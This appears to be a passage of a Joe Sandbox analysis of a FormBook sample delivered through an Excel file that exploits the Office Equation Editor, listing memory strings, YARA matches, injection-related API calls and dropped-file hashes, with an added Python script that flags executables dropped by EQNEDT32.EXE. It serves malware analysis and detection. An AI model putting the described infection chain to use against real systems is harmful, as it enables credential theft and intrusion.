          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2203542912.000000000861C000.00000004.00000001.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknown | HTTPS traffic detected: 52.59.165.42:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2e30000.15.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2e30000.15.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
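The two "File created" findings above are the pivot of the whole chain: the Office equation COM server (EQNEDT32.EXE) writing executables into C:\Users\Public and the IE cache, which is how a document-viewer exploit hands off to a standalone payload. The Python below is an added example and not part of the sandbox report: it triages file-creation events on that pattern, treating any write by EQNEDT32.EXE as anomalous, a write whose content starts with an MZ header as a dropped PE, and a write into CryptnetUrlCache (the CryptoAPI certificate/CRL cache, seen earlier in this report) as a side effect of the process having made a network request rather than a payload. The events, process paths and file headers are constructed to mirror the report's findings; the EXCEL.EXE event and the OLE temp file it writes are an assumed negative case.

```python
from dataclasses import dataclass

EQUATION_EDITOR = "EQNEDT32.EXE"

# Lower-case path fragments of directories a non-elevated exploit payload is usually dropped into
DROP_DIRS = ("\\users\\public\\", "\\content.ie5\\", "\\appdata\\local\\temp\\")


@dataclass
class FileCreate:
    process_image: str  # full image path of the process that created the file
    target_path: str    # path of the file it created
    head: bytes         # first bytes of the file's content


def is_pe(head: bytes) -> bool:
    """Cheap PE check on the DOS 'MZ' magic; a full check would follow e_lfanew to the PE signature."""
    return head[:2] == b"MZ"


def triage_file_create(ev: FileCreate) -> dict:
    """Classify one file-creation event and list the reasons for the verdict."""
    reasons = []
    writer = ev.process_image.rsplit("\\", 1)[-1].upper()
    if writer != EQUATION_EDITOR:
        return {"verdict": "not_equation_editor", "reasons": reasons}
    reasons.append("writer is the Equation Editor, which has no business creating files at all")
    path = ev.target_path.lower()
    if any(d in path for d in DROP_DIRS):
        reasons.append("target sits in a user-writable drop directory")
    if "\\cryptneturlcache\\" in path:
        # CryptoAPI caches certificates/CRLs it fetched over the network here: not a payload,
        # but evidence that the exploited process made an outbound connection
        reasons.append("CryptoAPI URL cache write: the process fetched something over the network")
    if is_pe(ev.head):
        reasons.append("content starts with an MZ header: dropped executable")
        return {"verdict": "pe_drop", "reasons": reasons}
    return {"verdict": "non_pe_write", "reasons": reasons}


def pe_drops(events) -> list:
    """Paths of every executable the Equation Editor dropped, in event order."""
    return [ev.target_path for ev in events if triage_file_create(ev)["verdict"] == "pe_drop"]


# Constructed events mirroring the report's 'File created' findings; the file heads are illustrative
EQ = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EVENTS = [
    FileCreate(EQ, r"C:\Users\Public\vbc.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    FileCreate(EQ, r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
                   r"\Content.IE5\ZAE7RW1P\winlog[1].exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    FileCreate(EQ, r"C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content"
                   r"\E0F5C59F9FA661F6F4C50B87FEF3A15A", b"\x30\x82\x05\x1a"),  # DER blob, constructed
    # Assumed negative case: Excel writing an OLE compound temp file (magic D0 CF 11 E0)
    FileCreate(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
               r"C:\Users\user\AppData\Local\Temp\~DF7A2B.tmp", b"\xd0\xcf\x11\xe0"),
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage_file_create(ev)["verdict"], ev.target_path)
```

The MZ check is deliberately minimal; in a real pipeline you would also want the image load or process creation that follows the drop, since a PE written by EQNEDT32.EXE and never executed is still a strong signal but a PE written and then launched (as vbc.exe is here) is the incident.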
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exe | Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exe | Memory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004181CA NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004182FA NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_009500C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00950048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00950078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_009507AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00950060 NtQuerySection,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_009501D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0095010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00950C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_009510D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00951148 NtOpenThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00951930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0094FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00951D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0094FF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004181CA NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041827A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004182FA NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B310D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30078 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30060 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B301D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B3010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31148 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B30C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B31D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00B2FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000981CA NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0009827A NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_000982FA NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_005C67C2 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: Bank Details.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dll 2BF1F784B019210A10EEF61E5AF8ABFBB9E02748CF9D6718F4BF6B3F72661779
          Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
          Source: C:\Users\Public\vbc.exeCode function: String function: 00419F80 appears 40 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0095DF5C appears 137 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041A0B0 appears 52 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009A373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0095E2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 009A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B83F92 appears 132 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00BAF970 appears 84 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 00B8373B appears 253 times
